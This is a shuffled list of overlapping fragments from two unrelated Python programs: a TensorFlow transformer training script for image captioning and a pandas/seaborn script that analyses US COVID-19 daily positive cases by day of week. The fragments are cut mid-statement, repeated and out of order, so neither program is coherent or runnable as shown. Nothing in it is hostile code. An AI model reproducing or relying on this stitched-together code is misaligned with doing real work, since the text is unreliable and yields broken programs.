=", "mask the encoder outputs. dec_padding_mask = vt.create_padding_mask(inp_seq) # Used in the 1st attention", "img_train, cap_train = img_names, captions # Load the numpy file with extracted ResNet50", "only use the first GPU try: tf.config.experimental.set_memory_growth(gpus[0], True) tf.config.experimental.set_visible_devices(gpus[0], 'GPU') logical_gpus = tf.config.experimental.list_logical_devices('GPU')", "x.split('/')[-1][:-3] + 'npy') ######################### # Prepare tf.DataSet for training ######################### captions = inputs.tokens.tolist()", "# Training Setup ######################### # Learning Rate Schedule, as per `Attention is All", "0)) loss_ = loss_object(real, pred) mask = tf.cast(mask, dtype=loss_.dtype) loss_ *= mask return", "attention block in the decoder. # It is used to pad and mask", "tar): # Encoder padding mask - This should just be 1's # input", "batch in an epoch @tf.function def train_step(inp, tar): tar_inp = tar[:, :-1] tar_real", "chck if GPU can be seen by TF tf.config.list_physical_devices('GPU') # tf.debugging.set_log_device_placement(True) # only", "size # Small Model num_layers = 4 d_model = 128 dff = d_model", "tf.reduce_sum(loss_) / tf.reduce_sum(mask) train_loss = tf.keras.metrics.Mean(name='train_loss') train_accuracy = tf.keras.metrics.SparseCategoricalAccuracy( name='train_accuracy') ######################### # Helper", "import pandas as pd from sklearn.model_selection import train_test_split import json from glob import", "tf.train.Checkpoint(transformer=transformer, optimizer=optimizer) ckpt_manager = tf.train.CheckpointManager(ckpt, checkpoint_path, max_to_keep=5) # if a checkpoint exists, restore", "x = x + [0] * int(max_len - len(x)) return x[:max_len] inputs['tokens'] =", "# for special tokens start = '<s>' end = '</s>' inputs['tokenized'] = inputs['caption'].map(", "checkpoint. 
if ckpt_manager.latest_checkpoint: ckpt.restore(ckpt_manager.latest_checkpoint) print('Latest checkpoint restored!!') ######################### # Training Loops ######################### #", "masks def create_masks(inp, tar): # Encoder padding mask - This should just be", "epochs also transformer = vt.Transformer(num_layers, d_model, num_heads, dff, target_vocab_size, pe_input=49, # 7x7 pixels", "Need' paper class CustomSchedule(tf.keras.optimizers.schedules.LearningRateSchedule): def __init__(self, d_model, warmup_steps=4000): super(CustomSchedule, self).__init__() self.d_model = d_model", "of captions after tokenization # tfds demonstrated in earlier chapters # This is", "Training for epoch in range(EPOCHS): start_tm = time.time() train_loss.reset_states() train_accuracy.reset_states() # inp ->", "and 4H (4x768) as feedforward size # Small Model num_layers = 4 d_model", "tf.math.logical_not(tf.math.equal(real, 0)) loss_ = loss_object(real, pred) mask = tf.cast(mask, dtype=loss_.dtype) loss_ *= mask", "by TF tf.config.list_physical_devices('GPU') # tf.debugging.set_log_device_placement(True) # only to check GPU usage gpus =", "num_heads = 12 target_vocab_size = cap_tokenizer.vocab_size # already includes start/end tokens dropout_rate =", "tar_real = tar[:, 1:] enc_padding_mask, combined_mask, dec_padding_mask = create_masks(inp, tar_inp) with tf.GradientTape() as", "tensorflow.keras.preprocessing.image import load_img import tensorflow_datasets as tfds import numpy as np import pandas", "import os import time import datetime from tqdm import tqdm # our visual", "inputs['image'].map(lambda x: save_prefix + x.split('/')[-1][:-3] + 'npy') ######################### # Prepare tf.DataSet for training", "= step * (self.warmup_steps ** -1.5) return tf.math.rsqrt(self.d_model) * tf.math.minimum(arg1, arg2) learning_rate =", "as plt # temp_learning_rate_schedule = CustomSchedule(d_model) # # plt.plot(temp_learning_rate_schedule(tf.range(40000, dtype=tf.float32))) # 
plt.ylabel(\"Learning Rate\")", "######################### # setup training parameters BUFFER_SIZE = 1000 BATCH_SIZE = 64 # can", "x: len(cap_tokenizer.encode(x.lower()))) # We will set this as the max length of captions", "CuDNN on GPU ## tf.keras.backend.clear_session() # - for easy reset of notebook state", "loaded\") ######################### # Tokenize Captions ######################### cap_tokenizer = tfds.features.text.SubwordTextEncoder.load_from_file( \"captions\") print(cap_tokenizer.encode(\"A man riding", "inputs['tokens'] = inputs.tokenized.map(lambda x: tokenize_pad(x)) print(\"Captions tokenized and padded/truncated\") # now to compute", "in parallel dataset = dataset.map(lambda item1, item2: tf.numpy_function( load_image_feature, [item1, item2], [tf.float32, tf.int32]),", "to split # img_train, img_val, cap_train, cap_val = train_test_split(img_names, # captions, # test_size=0.2,", "import train_test_split import json from glob import glob from PIL import Image import", "optimizer=optimizer) ckpt_manager = tf.train.CheckpointManager(ckpt, checkpoint_path, max_to_keep=5) # if a checkpoint exists, restore the", "be used enc_padding_mask = vt.create_padding_mask(inp_seq) # Used in the 2nd attention block in", "Data file mapping captions to images ######################### prefix = './data/' save_prefix = prefix", "This is a quick way if data fits in memory lens = inputs['caption'].map(lambda", "compute a column with the new name of the saved image feature file", "beta_1=0.9, beta_2=0.98, epsilon=1e-9) # Visualize the schedule: uncomment to plot # import matplotlib.pyplot", "import numpy as np import pandas as pd from sklearn.model_selection import train_test_split import", "= tf.config.experimental.list_logical_devices('GPU') print(len(gpus), \"Physical GPUs,\", len(logical_gpus), \"Logical GPU\") except RuntimeError as e: #", "pred) mask = tf.cast(mask, dtype=loss_.dtype) loss_ *= mask return tf.reduce_sum(loss_) / tf.reduce_sum(mask) train_loss", "+ 
'data.csv' inputs = pd.read_csv(annot, header=None, names=[\"caption\", \"image\"]) print(\"Data file loaded\") ######################### #", "prefix + 'data.csv' inputs = pd.read_csv(annot, header=None, names=[\"caption\", \"image\"]) print(\"Data file loaded\") #########################", "+ 1, train_loss.result(), train_accuracy.result())) print('Time taken for 1 epoch: {} secs\\n'.format(time.time() - start_tm))", "* (self.warmup_steps ** -1.5) return tf.math.rsqrt(self.d_model) * tf.math.minimum(arg1, arg2) learning_rate = CustomSchedule(d_model) optimizer", "True, enc_padding_mask, combined_mask, dec_padding_mask) loss = loss_function(tar_real, predictions) gradients = tape.gradient(loss, transformer.trainable_variables) optimizer.apply_gradients(zip(gradients,", "= cap_tokenizer.encode(x) if len(x) < max_len: x = x + [0] * int(max_len", "numpy as np import pandas as pd from sklearn.model_selection import train_test_split import json", "PIL import Image import pickle import re import os import time import datetime", "epoch @tf.function def train_step(inp, tar): tar_inp = tar[:, :-1] tar_real = tar[:, 1:]", "GPU can be seen by TF tf.config.list_physical_devices('GPU') # tf.debugging.set_log_device_placement(True) # only to check", "as embedding dim, 12 attention heads # and 4H (4x768) as feedforward size", "mask = tf.cast(mask, dtype=loss_.dtype) loss_ *= mask return tf.reduce_sum(loss_) / tf.reduce_sum(mask) train_loss =", "paper # num_heads = 12 target_vocab_size = cap_tokenizer.vocab_size # already includes start/end tokens", "Training Loops ######################### # setup training parameters BUFFER_SIZE = 1000 BATCH_SIZE = 64", "64 # can reduce or increase depending on GPU capacity # Shuffle and", "GPU ## ## this is important for running CuDNN on GPU ## tf.keras.backend.clear_session()", "tar[:, 1:] enc_padding_mask, combined_mask, dec_padding_mask = create_masks(inp, tar_inp) with tf.GradientTape() as tape: predictions,", "important for running CuDNN on 
GPU ## tf.keras.backend.clear_session() # - for easy reset", "epsilon=1e-9) # Visualize the schedule: uncomment to plot # import matplotlib.pyplot as plt", "Image import pickle import re import os import time import datetime from tqdm", "def load_image_feature(img_name, cap): img_tensor = np.load(img_name.decode('utf-8')) return img_tensor, cap dataset = tf.data.Dataset.from_tensor_slices((img_train, cap_train))", "# These parameters control the size and complexity of the model # BERT", "# Encoder padding mask - This should just be 1's # input shape", "= tfds.features.text.SubwordTextEncoder.load_from_file( \"captions\") print(cap_tokenizer.encode(\"A man riding a wave on top of a surfboard.\".lower()))", "# Used in the 1st attention block in the decoder. # It is", "in the input received by # the decoder. look_ahead_mask = vt.create_look_ahead_mask(tf.shape(tar)[1]) dec_target_padding_mask =", "extracted ResNet50 feature def load_image_feature(img_name, cap): img_tensor = np.load(img_name.decode('utf-8')) return img_tensor, cap dataset", "Please comment out if not training on GPU ## ## this is important", "{} Loss {:.6f} Accuracy {:.6f}'.format(epoch + 1, train_loss.result(), train_accuracy.result())) print('Time taken for 1", "Perform one step of raining on one batch in an epoch @tf.function def", "of the saved image feature file inputs['img_features'] = inputs['image'].map(lambda x: save_prefix + x.split('/')[-1][:-3]", "range(EPOCHS): start_tm = time.time() train_loss.reset_states() train_accuracy.reset_states() # inp -> images, tar -> caption", "8 # BERT Base Model # num_layers = 12 # d_model = 768", "7x7 pixels pe_target=target_vocab_size, rate=dropout_rate, use_pe=False ) ######################### # Training Setup ######################### # Learning", "(batch, (inp, tar)) in enumerate(dataset): train_step(inp, tar) if batch % 100 == 0:", "block in the decoder. 
# It is used to pad and mask future", "ts, epoch + 1, batch, train_loss.result(), train_accuracy.result())) if (epoch + 1) % 2", "just be 1's # input shape should be (batch_size, 49, 2048) inp_seq =", "gpus: # Restrict TensorFlow to only use the first GPU try: tf.config.experimental.set_memory_growth(gpus[0], True)", "way if data fits in memory lens = inputs['caption'].map(lambda x: len(cap_tokenizer.encode(x.lower()))) # We", "by # the decoder. look_ahead_mask = vt.create_look_ahead_mask(tf.shape(tar)[1]) dec_target_padding_mask = vt.create_padding_mask(tar) combined_mask = tf.maximum(dec_target_padding_mask,", "annot = prefix + 'data.csv' inputs = pd.read_csv(annot, header=None, names=[\"caption\", \"image\"]) print(\"Data file", "create_masks(inp, tar_inp) with tf.GradientTape() as tape: predictions, _ = transformer(inp, tar_inp, True, enc_padding_mask,", "for easy reset of notebook state # chck if GPU can be seen", "caption for (batch, (inp, tar)) in enumerate(dataset): train_step(inp, tar) if batch % 100", "# This is a quick way if data fits in memory lens =", "# random_state=42) img_train, cap_train = img_names, captions # Load the numpy file with", "with extracted ResNet50 feature def load_image_feature(img_name, cap): img_tensor = np.load(img_name.decode('utf-8')) return img_tensor, cap", "print(cap.numpy()) print(\"Training dataset prepared.\") ######################### # Build Transformer Model ######################### # These parameters", "# It is used to pad and mask future tokens in the input", "GPU usage gpus = tf.config.experimental.list_physical_devices('GPU') if gpus: # Restrict TensorFlow to only use", "- This should just be 1's # input shape should be (batch_size, 49,", "train_accuracy = tf.keras.metrics.SparseCategoricalAccuracy( name='train_accuracy') ######################### # Helper function for creating masks def create_masks(inp,", "dataset.prefetch(buffer_size=tf.data.experimental.AUTOTUNE) # Perform one step of raining on one batch in 
an epoch", "# inp -> images, tar -> caption for (batch, (inp, tar)) in enumerate(dataset):", "(%H:%M:%S)\") print('[{}] Epoch {} Batch {} Loss {:.6f} Accuracy {:.6f}'.format( ts, epoch +", "inputs.tokenized[:5]) def tokenize_pad(x): x = cap_tokenizer.encode(x) if len(x) < max_len: x = x", "creating masks def create_masks(inp, tar): # Encoder padding mask - This should just", "length of captions after tokenization # tfds demonstrated in earlier chapters # This", "# Visible devices must be set before GPUs have been initialized print(e) ###############################################", "combined_mask, dec_padding_mask # Checkpoints setup checkpoint_path = \"./checkpoints/train-small-model-nope-20ep\" ckpt = tf.train.Checkpoint(transformer=transformer, optimizer=optimizer) ckpt_manager", "step * (self.warmup_steps ** -1.5) return tf.math.rsqrt(self.d_model) * tf.math.minimum(arg1, arg2) learning_rate = CustomSchedule(d_model)", "d_model * 4 # as per BERT paper # num_heads = 12 target_vocab_size", "Setup ######################### # Learning Rate Schedule, as per `Attention is All You Need'", "# for storing prefixes annot = prefix + 'data.csv' inputs = pd.read_csv(annot, header=None,", "tape: predictions, _ = transformer(inp, tar_inp, True, enc_padding_mask, combined_mask, dec_padding_mask) loss = loss_function(tar_real,", "loss_object = tf.keras.losses.SparseCategoricalCrossentropy( from_logits=True, reduction='none') def loss_function(real, pred): mask = tf.math.logical_not(tf.math.equal(real, 0)) loss_", "need to split # img_train, img_val, cap_train, cap_val = train_test_split(img_names, # captions, #", "import pickle import re import os import time import datetime from tqdm import", "feedforward size # Small Model num_layers = 4 d_model = 128 dff =", "header=None, names=[\"caption\", \"image\"]) print(\"Data file loaded\") ######################### # Tokenize Captions ######################### cap_tokenizer =", "return tf.math.rsqrt(self.d_model) * 
tf.math.minimum(arg1, arg2) learning_rate = CustomSchedule(d_model) optimizer = tf.keras.optimizers.Adam(learning_rate, beta_1=0.9, beta_2=0.98,", "arg2) learning_rate = CustomSchedule(d_model) optimizer = tf.keras.optimizers.Adam(learning_rate, beta_1=0.9, beta_2=0.98, epsilon=1e-9) # Visualize the", "dec_padding_mask = vt.create_padding_mask(inp_seq) # Used in the 1st attention block in the decoder.", "outputs. dec_padding_mask = vt.create_padding_mask(inp_seq) # Used in the 1st attention block in the", "# plt.ylabel(\"Learning Rate\") # plt.xlabel(\"Train Step\") ######################### # Loss and Metrics loss_object =", "= datetime.datetime.now().strftime(\"%d-%b-%Y (%H:%M:%S)\") print('[{}] Epoch {} Batch {} Loss {:.6f} Accuracy {:.6f}'.format( ts,", "print(\"Training dataset prepared.\") ######################### # Build Transformer Model ######################### # These parameters control", "- len(x)) return x[:max_len] inputs['tokens'] = inputs.tokenized.map(lambda x: tokenize_pad(x)) print(\"Captions tokenized and padded/truncated\")", "train_loss.reset_states() train_accuracy.reset_states() # inp -> images, tar -> caption for (batch, (inp, tar))", "length of captions split by spaces lens = inputs['caption'].map(lambda x: len(x.split())) # Max", "# BERT Base Model # num_layers = 12 # d_model = 768 #", "2048) inp_seq = tf.ones([inp.shape[0], inp.shape[1]]) # all pixels to be used enc_padding_mask =", "######################### # Prepare tf.DataSet for training ######################### captions = inputs.tokens.tolist() img_names = inputs.img_features.tolist()", "######################### # Helper function for creating masks def create_masks(inp, tar): # Encoder padding", "glob from PIL import Image import pickle import re import os import time", "= d_model * 4 # as per BERT paper # num_heads = 12", "######################### # Learning Rate Schedule, as per `Attention is All You Need' paper", "tf.keras.metrics.Mean(name='train_loss') train_accuracy = 
tf.keras.metrics.SparseCategoricalAccuracy( name='train_accuracy') ######################### # Helper function for creating masks def", "see results in 4-10 epochs also transformer = vt.Transformer(num_layers, d_model, num_heads, dff, target_vocab_size,", "import re import os import time import datetime from tqdm import tqdm #", "start + x.lower().strip() + end) print(\"Some prepared captions: \", inputs.tokenized[:5]) def tokenize_pad(x): x", "dtype=tf.float32))) # plt.ylabel(\"Learning Rate\") # plt.xlabel(\"Train Step\") ######################### # Loss and Metrics loss_object", "Use map to load the numpy files in parallel dataset = dataset.map(lambda item1,", "Visible devices must be set before GPUs have been initialized print(e) ############################################### #########################", "captions without truncation max_len = int(lens.quantile(0.99) + 1) # for special tokens start", "= 12 # d_model = 768 # dff = d_model * 4 #", "have been initialized print(e) ############################################### ######################### # Load Data file mapping captions to", "# d_model = 768 # dff = d_model * 4 # as per", "which cover 99% of the captions without truncation max_len = int(lens.quantile(0.99) + 1)", "checkpoint_path, max_to_keep=5) # if a checkpoint exists, restore the latest checkpoint. 
if ckpt_manager.latest_checkpoint:", "+ \"features/\" # for storing prefixes annot = prefix + 'data.csv' inputs =", "target_vocab_size = cap_tokenizer.vocab_size # already includes start/end tokens dropout_rate = 0.1 EPOCHS =", "cover 99% of the captions without truncation max_len = int(lens.quantile(0.99) + 1) #", "`Attention is All You Need' paper class CustomSchedule(tf.keras.optimizers.schedules.LearningRateSchedule): def __init__(self, d_model, warmup_steps=4000): super(CustomSchedule,", "pickle import re import os import time import datetime from tqdm import tqdm", "d_model, warmup_steps=4000): super(CustomSchedule, self).__init__() self.d_model = d_model self.d_model = tf.cast(self.d_model, tf.float32) self.warmup_steps =", "used to pad and mask future tokens in the input received by #", "uncomment to plot # import matplotlib.pyplot as plt # temp_learning_rate_schedule = CustomSchedule(d_model) #", "= tf.data.Dataset.from_tensor_slices((img_train, cap_train)) # Use map to load the numpy files in parallel", "load_image_feature(img_name, cap): img_tensor = np.load(img_name.decode('utf-8')) return img_tensor, cap dataset = tf.data.Dataset.from_tensor_slices((img_train, cap_train)) #", "from sklearn.model_selection import train_test_split import json from glob import glob from PIL import", "{:.6f} Accuracy {:.6f}'.format( ts, epoch + 1, batch, train_loss.result(), train_accuracy.result())) if (epoch +", "{}'.format(epoch + 1, ckpt_save_path)) print('Epoch {} Loss {:.6f} Accuracy {:.6f}'.format(epoch + 1, train_loss.result(),", "1st attention block in the decoder. 
# It is used to pad and", "os import time import datetime from tqdm import tqdm # our visual transformer", "feature def load_image_feature(img_name, cap): img_tensor = np.load(img_name.decode('utf-8')) return img_tensor, cap dataset = tf.data.Dataset.from_tensor_slices((img_train,", "RuntimeError as e: # Visible devices must be set before GPUs have been", "= 1000 BATCH_SIZE = 64 # can reduce or increase depending on GPU", "num_parallel_calls=tf.data.experimental.AUTOTUNE) # To verify for img, cap in dataset.take(2): print(img.shape) print(cap.numpy()) print(\"Training dataset", "# all pixels to be used enc_padding_mask = vt.create_padding_mask(inp_seq) # Used in the", "class CustomSchedule(tf.keras.optimizers.schedules.LearningRateSchedule): def __init__(self, d_model, warmup_steps=4000): super(CustomSchedule, self).__init__() self.d_model = d_model self.d_model =", "use_pe=False ) ######################### # Training Setup ######################### # Learning Rate Schedule, as per", "as e: # Visible devices must be set before GPUs have been initialized", "x[:max_len] inputs['tokens'] = inputs.tokenized.map(lambda x: tokenize_pad(x)) print(\"Captions tokenized and padded/truncated\") # now to", "set this as the max length of captions # which cover 99% of", "capacity # Shuffle and batch dataset = dataset.shuffle(BUFFER_SIZE).batch(BATCH_SIZE) dataset = dataset.prefetch(buffer_size=tf.data.experimental.AUTOTUNE) # Perform", "prefix + \"features/\" # for storing prefixes annot = prefix + 'data.csv' inputs", "is used to pad and mask future tokens in the input received by", "= loss_function(tar_real, predictions) gradients = tape.gradient(loss, transformer.trainable_variables) optimizer.apply_gradients(zip(gradients, transformer.trainable_variables)) train_loss(loss) train_accuracy(tar_real, predictions) #", "the saved image feature file inputs['img_features'] = inputs['image'].map(lambda x: save_prefix + x.split('/')[-1][:-3] +", "Captions ######################### 
cap_tokenizer = tfds.features.text.SubwordTextEncoder.load_from_file( \"captions\") print(cap_tokenizer.encode(\"A man riding a wave on top", "+ 1, ckpt_save_path)) print('Epoch {} Loss {:.6f} Accuracy {:.6f}'.format(epoch + 1, train_loss.result(), train_accuracy.result()))", "without truncation max_len = int(lens.quantile(0.99) + 1) # for special tokens start =", "############### ## Please comment out if not training on GPU ## ## this", "restored!!') ######################### # Training Loops ######################### # setup training parameters BUFFER_SIZE = 1000", "import load_img import tensorflow_datasets as tfds import numpy as np import pandas as", "prepared captions: \", inputs.tokenized[:5]) def tokenize_pad(x): x = cap_tokenizer.encode(x) if len(x) < max_len:", "dec_padding_mask # Checkpoints setup checkpoint_path = \"./checkpoints/train-small-model-nope-20ep\" ckpt = tf.train.Checkpoint(transformer=transformer, optimizer=optimizer) ckpt_manager =", "# BERT (base) uses 12 layers, 768 as embedding dim, 12 attention heads", "arg2 = step * (self.warmup_steps ** -1.5) return tf.math.rsqrt(self.d_model) * tf.math.minimum(arg1, arg2) learning_rate", "should just be 1's # input shape should be (batch_size, 49, 2048) inp_seq", "* 4 # as per BERT paper # num_heads = 12 target_vocab_size =", ":-1] tar_real = tar[:, 1:] enc_padding_mask, combined_mask, dec_padding_mask = create_masks(inp, tar_inp) with tf.GradientTape()", "epoch in range(EPOCHS): start_tm = time.time() train_loss.reset_states() train_accuracy.reset_states() # inp -> images, tar", "1, ckpt_save_path)) print('Epoch {} Loss {:.6f} Accuracy {:.6f}'.format(epoch + 1, train_loss.result(), train_accuracy.result())) print('Time", "= inputs.tokens.tolist() img_names = inputs.img_features.tolist() # we only took half validation examples so" ]
[ "# # EXPORTS # =========================================================================== # # Define the module's API -- the", "df def add_columns(df: pd.DataFrame): # Format date. df.date = pd.to_datetime(df.date, format='%Y%m%d') # Set", "y='posIncrease', marker='o', ) ax.set_title('COVID-19 | Year 2020 | USA | Daily New Positive", "for reuse. return df # -- Data Processing: Transform -- # def transform_data(df:", "Filesytem -- # ROOT_DIR = os.path.join(os.getcwd(), '..') DATA_DIR = '../data' RESULTS_DIR = '../results'", "of Cases') # Debug data frame. DEBUG and preview(df, summarize_by_dow.__name__) # plt.show() fig.savefig(f'{RESULTS_DIR}/summarize_dow.png')", "- The main module for processing data and creating visual summaries for this", "preview(df, summarize_maxima.__name__) # plt.show() fig.savefig(f'{RESULTS_DIR}/summarize_maxima.png') def visualize_data(df: pd.DataFrame): set_figure_defaults() plot_series(df.sort_values('date')) summarize_by_dow(df) summarize_by_dow_percent(df) summarize_by_dow_zscore(df)", "Add date-derived columns. df['date'] = df.index.date df['year'] = df.index.year df['month'] = df.index.month df['week']", "zScore( df.posIncrease, df.meanWeeklyPosIncrease, df.stdWeeklyPosIncrease, ) # Add delta columns. df['day1LagDelta'] = lag_delta(df.posIncrease, 1)", "plot_series(df: pd.DataFrame): fig = plt.figure() ax = plt.subplot(111) ax.xaxis.set_major_formatter( mpl_dates.DateFormatter('%m-%d-%Y'), ) sns.lineplot( data=df,", "Cases') ax.set_xlabel('Date') ax.set_ylabel('Count of Cases') ax.xaxis_date() # plt.show() # Debug data frame. DEBUG", "16, 2020' # =========================================================================== # # EXPORTS # =========================================================================== # # Define the", "Save a copy of the processed data. 
df.to_csv( f'{DATA_DIR}/02_intermediate/{DAILY}_rename_columns.csv', index=True, ) # Debug", "type(df).__name__) print(df.head(5)) def zScore(x, mean, std): return (x - mean) / std #", "reuse. return df # -- Data Processing: Load -- # # -- Utilities", "Program -- # # If this module is in the main module, call", "# # If this module is in the main module, call the main()", "plt.show() fig.savefig(f'{RESULTS_DIR}/summarize_dow_percent.png') def summarize_by_dow_zscore(df: pd.DataFrame): fig = plt.figure() ax = plt.subplot(111) sns.boxplot( data=df,", "columns. df_weekly = df.groupby('week', as_index=False)['posIncrease'].agg( { 'weeklyPosIncrease': 'sum', 'meanWeeklyPosIncrease': 'mean', 'stdWeeklyPosIncrease': 'std', },", "pd.DataFrame) -> pd.DataFrame: df = rename_columns(df) df = add_columns(df) # Debug data frame.", "-- # def plot_series(df: pd.DataFrame): fig = plt.figure() ax = plt.subplot(111) ax.xaxis.set_major_formatter( mpl_dates.DateFormatter('%m-%d-%Y'),", "row['day1LagDelta'] < 0 and row['day1LeadDelta'] > 0: return True else: return False def", "sns.boxplot( data=df, x='dow', y='zscoreWeeklyPosIncrease', order=DOW, ) ax.set_title('COVID-19 | Year 2020 | USA |", "df['dowIndex'] = df.index.dayofweek # Add group-summarization columns. df_weekly = df.groupby('week', as_index=False)['posIncrease'].agg( { 'weeklyPosIncrease':", "] # =========================================================================== # # IMPORTS # =========================================================================== # # -- Python Standard", "Add group-summarization columns. df_weekly = df.groupby('week', as_index=False)['posIncrease'].agg( { 'weeklyPosIncrease': 'sum', 'meanWeeklyPosIncrease': 'mean', 'stdWeeklyPosIncrease':", "summarize_by_dow_percent(df) summarize_by_dow_zscore(df) summarize_maxima(df[df['localMaximum'].eq(True)]) # Debug data frame. 
DEBUG and preview(df, visualize_data.__name__) # Return", "df, df_weekly, how='left', on='week', ) df['pctWeeklyPosIncrease'] = percent(df.posIncrease, df.weeklyPosIncrease) df['zscoreWeeklyPosIncrease'] = zScore( df.posIncrease,", "plt.figure() ax = plt.subplot(111) ax.xaxis.set_major_formatter( mpl_dates.DateFormatter('%m-%d-%Y'), ) sns.lineplot( data=df, x='date', y='posIncrease', marker='o', )", "processed data. df.to_csv( f'{DATA_DIR}/02_intermediate/{DAILY}_rename_columns.csv', index=True, ) # Debug data frame. DEBUG and preview(df,", "# -- Main Program -- # # If this module is in the", "# -- Python Standard Library -- # import os # -- 3rd Party", "frame. DEBUG and preview(df, add_columns.__name__) # Return data frame for reuse. return df", "visualize_data(df) # =========================================================================== # # MAIN EXECUTION # =========================================================================== # # -- Main", "-- Data -- # DAILY = 'daily' WEEKLY = 'weekly' COLUMNS = {", "# functions, etc.) -- when performing a \"wild import\" (`from field import *`).", "Week') ax.set_ylabel('Percent of Weekly Count of Cases') # Debug data frame. DEBUG and", "If this module is in the main module, call the main() function. if", "True else: return False def local_min(row): if row['day1LagDelta'] < 0 and row['day1LeadDelta'] >", "extracted data. df.to_csv( f'{DATA_DIR}/01_raw/{DAILY}_extract_data.csv', index=False, ) # Debug data frame. DEBUG and preview(df,", "= 'https://covidtracking.com/api/v1/us/daily.csv' # =========================================================================== # # FUNCTIONS # =========================================================================== # # -- Data", "preview(df: pd.DataFrame, func_name: str): print(f'INSIDE {func_name}(): type =', type(df).__name__) print(df.head(5)) def zScore(x, mean,", "# Return data frame for reuse. 
return df # -- Data Processing: Transform", "MAIN EXECUTION # =========================================================================== # # -- Main Program -- # # If", "the list of exportable objects (classes, # functions, etc.) -- when performing a", "mpl_dates.DateFormatter('%m-%d-%Y'), ) sns.lineplot( data=df, x='date', y='posIncrease', marker='o', ) ax.set_title('COVID-19 | Year 2020 |", "import\" (`from field import *`). __all__ = [ 'DEBUG', ] # =========================================================================== #", "pd.DataFrame): fig = plt.figure() ax = plt.subplot(111) sns.countplot( data=df, x='dow', order=DOW, ) ax.set_title('COVID-19", "pd.DataFrame: # Download source data as CSV from an API. df = pd.read_csv(SOURCE_URL)", "return df def rename_columns(df: pd.DataFrame) -> pd.DataFrame: # Rename columns. df.rename(columns=COLUMNS, inplace=True) #", "as_index=False)['posIncrease'].agg( { 'weeklyPosIncrease': 'sum', 'meanWeeklyPosIncrease': 'mean', 'stdWeeklyPosIncrease': 'std', }, ) df = pd.merge(", "data=df, x='dow', y='zscoreWeeklyPosIncrease', order=DOW, ) ax.set_title('COVID-19 | Year 2020 | USA | Daily", "-- # DAILY = 'daily' WEEKLY = 'weekly' COLUMNS = { 'positive': 'pos',", "= pd.merge( df, df_weekly, how='left', on='week', ) df['pctWeeklyPosIncrease'] = percent(df.posIncrease, df.weeklyPosIncrease) df['zscoreWeeklyPosIncrease'] =", "0: return True else: return False def local_min(row): if row['day1LagDelta'] < 0 and", "'Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday', 'Saturday', ] # -- Debugging -- # DEBUG", "-- Main Program -- # def main(): df = extract_data() df = transform_data(df)", "Data Analytics -- # def plot_series(df: pd.DataFrame): fig = plt.figure() ax = plt.subplot(111)", "pd.DataFrame): fig = plt.figure() ax = plt.subplot(111) sns.boxplot( data=df, x='dow', y='posIncrease', order=DOW, )", "df = extract_data() df = transform_data(df) visualize_data(df) # 
=========================================================================== # # MAIN EXECUTION", "the processed data. df.to_csv( f'{DATA_DIR}/02_intermediate/{DAILY}_rename_columns.csv', index=True, ) # Debug data frame. DEBUG and", "summaries for this study. \"\"\" # =========================================================================== # # METADATA # =========================================================================== #", "-- # import os # -- 3rd Party -- # import matplotlib.dates as", "of the processed data. df.to_csv( f'{DATA_DIR}/02_intermediate/{DAILY}_rename_columns.csv', index=True, ) # Debug data frame. DEBUG", "ax.set_xlabel('Date') ax.set_ylabel('Count of Cases') ax.xaxis_date() # plt.show() # Debug data frame. DEBUG and", "Add local extrema columns. df['localMaximum'] = df.apply(local_max, axis=1) df['localMinimum'] = df.apply(local_min, axis=1) #", "# -- Utilities -- # def lag_delta(series, period): return series - series.shift(period) def", "a copy of the processed data. df.to_csv( f'{DATA_DIR}/02_intermediate/{DAILY}_rename_columns.csv', index=True, ) # Debug data", "# CONSTANTS # =========================================================================== # # -- Data -- # DAILY = 'daily'", "df['localMaximum'] = df.apply(local_max, axis=1) df['localMinimum'] = df.apply(local_min, axis=1) # Save a copy of", "lag_delta(series, period): return series - series.shift(period) def lead_delta(series, period): return series.shift(-period) - series", "f'{DATA_DIR}/01_raw/{DAILY}_extract_data.csv', index=False, ) # Debug data frame. DEBUG and preview(df, extract_data.__name__) # Return", "| USA | Daily New Positive Cases') ax.set_xlabel('Day of Week') ax.set_ylabel('Z-Score of Weekly", "python3 \"\"\" main.py - The main module for processing data and creating visual", "pd.DataFrame: df = rename_columns(df) df = add_columns(df) # Debug data frame. 
DEBUG and", "Daily New Positive Cases') ax.set_xlabel('Date') ax.set_ylabel('Count of Cases') ax.xaxis_date() # plt.show() # Debug", "['Robert (Bob) <NAME>'] __created_date__ = 'Sep 16, 2020' __modified_date__ = 'Sep 16, 2020'", "y='pctWeeklyPosIncrease', order=DOW, ) ax.set_title('COVID-19 | Year 2020 | USA | Daily New Positive", "0 and row['day1LeadDelta'] > 0: return True else: return False def percent(num, denom):", "mean) / std # -- Main Program -- # def main(): df =", ") sns.lineplot( data=df, x='date', y='posIncrease', marker='o', ) ax.set_title('COVID-19 | Year 2020 | USA", "as pd import seaborn as sns # =========================================================================== # # CONSTANTS # ===========================================================================", "# Use seaborn style defaults. Set the default figure size. sns.set( style='darkgrid', rc={'figure.figsize':", "columns. df['date'] = df.index.date df['year'] = df.index.year df['month'] = df.index.month df['week'] = df.index.week", "= df.index.date df['year'] = df.index.year df['month'] = df.index.month df['week'] = df.index.week df['dow'] =", "'std', }, ) df = pd.merge( df, df_weekly, how='left', on='week', ) df['pctWeeklyPosIncrease'] =", "fig.savefig(f'{RESULTS_DIR}/summarize_dow.png') def summarize_by_dow_percent(df: pd.DataFrame): fig = plt.figure() ax = plt.subplot(111) sns.boxplot( data=df, x='dow',", "Extract -- # def extract_data() -> pd.DataFrame: # Download source data as CSV", "# def lag_delta(series, period): return series - series.shift(period) def lead_delta(series, period): return series.shift(-period)", "set_figure_defaults(): # Use seaborn style defaults. Set the default figure size. sns.set( style='darkgrid',", "= plt.figure() ax = plt.subplot(111) ax.xaxis.set_major_formatter( mpl_dates.DateFormatter('%m-%d-%Y'), ) sns.lineplot( data=df, x='date', y='posIncrease', marker='o',", "# Set the date as the DataFrame's index. 
